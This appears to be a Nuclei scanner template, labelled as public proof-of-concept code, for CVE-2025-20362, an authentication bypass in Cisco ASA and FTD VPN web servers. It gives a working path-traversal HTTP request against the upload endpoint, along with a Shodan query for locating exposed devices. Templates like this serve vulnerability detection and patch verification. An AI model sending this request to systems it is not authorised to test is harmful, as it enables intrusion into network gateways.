A vulnerability in the VPN web server of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to access restricted URL endpoints that are related to remote access VPN that should otherwise be inaccessible without authentication. This vulnerability is due to improper validation of user-supplied input in HTTP(S) requests.
PoC代码[已公开]
id: CVE-2025-20362
info:
name: Cisco Secure Firewall ASA & FTD - Authentication Bypass
author: DhiyaneshDk,attackerkb
severity: medium
description: |
A vulnerability in the VPN web server of Cisco Secure Firewall Adaptive Security Appliance (ASA) Software and Cisco Secure Firewall Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to access restricted URL endpoints that are related to remote access VPN that should otherwise be inaccessible without authentication. This vulnerability is due to improper validation of user-supplied input in HTTP(S) requests.
impact: |
An attacker could exploit this vulnerability by sending crafted HTTP requests to a targeted web server on a device. A successful exploit could allow the attacker to access a restricted URL without authentication.
remediation: |
Update to the latest available version of Cisco Secure Firewall ASA and FTD Software.
reference:
- https://attackerkb.com/topics/Szq5u0xgUX/cve-2025-20362/rapid7-analysis
- https://nvd.nist.gov/vuln/detail/cve-2025-20362
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N
cvss-score: 6.5
cve-id: CVE-2025-20362
epss-score: 0.29718
epss-percentile: 0.96416
cwe-id: CWE-862
cpe: cpe:2.3:o:cisco:adaptive_security_appliance_software:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: cisco
product: adaptive-security-appliance-software
shodan-query: html:"/+CSCOE+/logon.html"
tags: cve,cve2025,cisco,asa,auth-bypass,kev,vkev,vuln
http:
- raw:
- |
POST /+CSCOU+//../+CSCOE+/files/file_action.html?mode=upload&path=foo&server=srv&sourceurl=qaz HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;boundary=ee
Content-Length: 10
aabbccdd
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert('CSRF token mismatch')"
- type: status
status:
- 200
# digest: 4a0a00473045022100fef7ba99e5aa805a6728be026dff6cf9905236ce5592e9df7acd41572b9bc0aa02205b054f823d70e5f543219544f462a464ac3e4fa4921ec57bddbd1c75ad680975:922c64590222798bb761d5b6d8e72950